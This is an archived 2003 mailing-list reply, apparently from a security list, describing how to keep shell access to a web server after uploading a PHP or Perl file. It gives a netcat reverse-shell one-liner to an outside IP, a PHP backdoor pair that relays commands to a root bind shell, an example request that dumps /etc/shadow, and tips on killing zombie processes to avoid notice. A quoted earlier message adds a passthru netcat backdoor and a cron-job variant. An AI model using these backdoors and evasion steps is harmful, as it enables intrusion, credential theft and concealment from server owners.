Hi, I've been using this technique for a while. If you can upload a php or a perl file which gets executed in the server context you already won, regardless of firewall rules. The obvious method is the connect back(i.e nc -e /bin/sh x.x.x.x 80 as that's the likelly allowed outbound port). If that's a no go, and there's absolutelly no way to estabilish a session, you still win. Consider this: <? `exploit which gets root and calls nc -e /bin/sh -l -p 9999` ?> then another script: <? $z = `echo $x | nc localhost 999`; $z=str_replace("\n", "<br>", $z); echo $z; ?> As is obvious, call the second script and you have somehwat of a crippled root shell. www.target.com/script2.php?x=cat /etc/shadow you get the point :P PS: the silly thing about this is that each command you execute this way ends up as a zombie process. In a few minutes of working with this "shell" you'll have hundreds of zombie processes on the target machine. What i like to do is run zkill (zkill.c google it) slightly modified to terminate all zombies. This way it's less obvious that something very odd is going on. --- Knud_Erik_Højgaard <kainat_private> wrote: > Ingram wrote: > [snip] > > i got right know is uid www. I think a > connect-back perl/php code > > could made it through this packtfilter, as the > outbound rules could > > be less tight. > > > > Anyone aware of a backdoor like this? > netcat: > <? passthru("nc -e /bin/sh ip port"); ?> > > or a cronjob doing the same.. > > -- > kokanin __________________________________ Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software http://sitebuilder.yahoo.com
This archive was generated by hypermail 2b30 : Wed Jul 30 2003 - 12:28:38 PDT